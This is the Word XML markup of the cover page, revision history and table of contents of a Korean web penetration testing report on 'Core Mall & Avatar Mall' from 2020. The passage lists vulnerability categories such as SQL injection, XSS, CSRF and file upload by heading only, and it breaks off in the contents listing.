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FD" w:rsidRPr="00C97C1E" w:rsidRDefault="003A4DC2" w:rsidP="003A4DC2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0AFC0F" wp14:editId="5F74A2F7">
            <wp:extent cx="1847850" cy="352425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6" name="그림 6" descr="C:\Users\student\AppData\Local\Microsoft\Windows\INetCache\Content.Word\멀티캠퍼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멀티캠퍼스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BFD" w:rsidRPr="00C97C1E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A5386A" wp14:editId="347207C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-261620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-363220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6532880" cy="9632950"/>
                <wp:effectExtent l="0" t="0" r="20320" b="2540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9632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05301" id="Rectangle 416" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-20.6pt;margin-top:-28.6pt;width:514.4pt;height:7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Y9w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" filled="f" strokecolor="#bfbfbf" strokeweight=".25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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E30F75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 w:rsidRPr="00C97C1E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3D25D" wp14:editId="49AA1712">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-247650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184785</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6523355" cy="9525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A82C4" id="직사각형 5" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-19.5pt;margin-top:14.55pt;width:513.65pt;height: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" fillcolor="#b2a1c7 [1943]" stroked="f" strokeweight="2pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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1D1BFD" w:rsidP="001D1BFD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pP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D71FF3" w:rsidRPr="00C97C1E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9E03F0" w:rsidRPr="00C97C1E" w:rsidRDefault="009E03F0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D71FF3" w:rsidRPr="00C97C1E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3A4DC2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 w:rsidRPr="00C97C1E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D78240" wp14:editId="30ACBDF9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>504825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>104774</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4914900" cy="1113155"/>
                <wp:effectExtent l="0" t="0" r="19050" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="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45" w:rsidRPr="00A01680" w:rsidRDefault="00FA3A45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웹 모</w:t>
                            </w:r>
                            <w:r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의해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킹 진단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8240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margin-left:39.75pt;margin-top:8.25pt;width:387pt;height:8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" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00FA3A45" w:rsidRPr="00A01680" w:rsidRDefault="00FA3A45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웹 모</w:t>
                      </w:r>
                      <w:r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의해</w:t>
                      </w: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킹 진단 보고서</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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770E1" w:rsidRPr="00C97C1E" w:rsidRDefault="001770E1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A10BAC" w:rsidP="001770E1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44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Core Mall &amp; Avata</w:t>
      </w:r>
      <w:r w:rsidR="003A4DC2" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>r Mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>l</w:t>
      </w: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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE04DF" w:rsidRPr="00C97C1E" w:rsidRDefault="00FE04DF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D1BFD" w:rsidRPr="00C97C1E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770E1" w:rsidRPr="00C97C1E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Pr="00C97C1E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Pr="00C97C1E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Pr="00C97C1E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D1BFD" w:rsidRPr="00C97C1E" w:rsidRDefault="00DE25A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  <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>임 종 철</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1BFD" w:rsidRPr="00C97C1E" w:rsidRDefault="00E30F75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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E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17A56DF" wp14:editId="2D638BFE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-247650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6523355" cy="9525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8F552" id="직사각형 2" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-19.5pt;margin-top:25.15pt;width:513.65pt;height:75pt;z-index:2516541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" fillcolor="#b2a1c7 [1943]" stroked="f" strokeweight="2pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003A4DC2" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidR="003A4DC2" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4B7F" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D71FF3" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
      <w:r w:rsidR="00275202" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4B7F" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A4DC2" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="003A4DC2" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96F08" w:rsidRPr="00C97C1E" w:rsidRDefault="001D1BFD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D96F08" w:rsidRPr="00C97C1E" w:rsidRDefault="00D96F08" w:rsidP="00D96F08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C97C1E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개 정 이 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2110"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96F08" w:rsidRPr="00C97C1E" w:rsidTr="003A4DC2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00D96F08" w:rsidRPr="00C97C1E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97C1E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D96F08" w:rsidRPr="00C97C1E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97C1E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>작성일</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2110" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00D96F08" w:rsidRPr="00C97C1E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97C1E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>변경내용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D96F08" w:rsidRPr="00C97C1E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97C1E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D96F08" w:rsidRPr="00C97C1E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97C1E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96F08" w:rsidRPr="00C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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10BAC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D96F08" w:rsidRPr="00A10BAC" w:rsidRDefault="002015B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10BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2020.08.20.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2110" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D96F08" w:rsidRPr="00A10BAC" w:rsidRDefault="002015B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10BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>모의해킹 진단 작성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A10BAC" w:rsidRDefault="002015B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10BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>임종철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C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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C97C1E" w:rsidTr="002015BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1744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A10BAC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96F08" w:rsidRPr="00C97C1E" w:rsidRDefault="00D96F08" w:rsidP="00D96F08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32242073"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="001A1B46" w:rsidRPr="00C97C1E" w:rsidRDefault="001A1B46" w:rsidP="00043EEC">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r w:rsidRPr="00C97C1E">
            <w:rPr>
              <w:lang w:val="ko-KR"/>
            </w:rPr>
            <w:t>목차</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="000411AE" w:rsidRDefault="001A1B46">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00C97C1E">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00C97C1E">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00C97C1E">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc48909002" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 개요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02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04" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1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목적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04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05" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1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진단 방법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0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06" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1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진단 일정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06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07" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4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진단 담당자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0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08" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5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진단대상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08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09" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6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진단항목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09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9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10"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48909017" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 총평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1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20" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2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noProof/>
              </w:rPr>
              <w:t>총평 요약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20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10"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48909021" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 상세 진단 결과(코어몰)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21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4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25" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3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SQL 인젝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2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4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26" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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26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4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27" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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2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4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28" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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28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6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29" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3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정보누출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29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30" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2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0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31" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2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1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32" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2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2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33" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3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악성 콘텐츠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3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34" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3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4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35" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3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1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36" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3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6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0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37" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4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크로스 사이트 스크립팅(Cross-site scripting)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0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38" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4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8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0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39" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4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39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0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40" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4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0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2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41" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5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한 패스워드 복구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1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42" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5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2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43" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5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3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44" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5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4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5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45" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6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크로스사이트 리퀘스트 변조(CSRF)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5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46" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6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6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5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47" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6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5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48" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6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8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49" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7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불충분한 인가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49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50" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7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0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51" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7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1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52" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7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2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9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53" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8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불충분한 세션 만료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3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9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54" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8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4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9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55" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8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29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56" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8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6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0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57" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9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세션 고정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58" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9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8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59" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9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59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60" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9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0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61" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10 자동화 공격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1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62" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10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2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63" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10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3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64" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10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4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5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65" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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프로세스 검증 누락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5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66" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11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6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5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67" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11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5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68" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11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8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69" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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파일 업로드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69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8909070" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12.1 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0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71" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12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1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72" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12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2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39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73" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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관리자 페이지 노출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3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0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74" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13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4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0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75" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13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0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76" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13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6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77" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14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위치 공개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78" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14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8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79" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14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79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80" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14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0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2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81" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
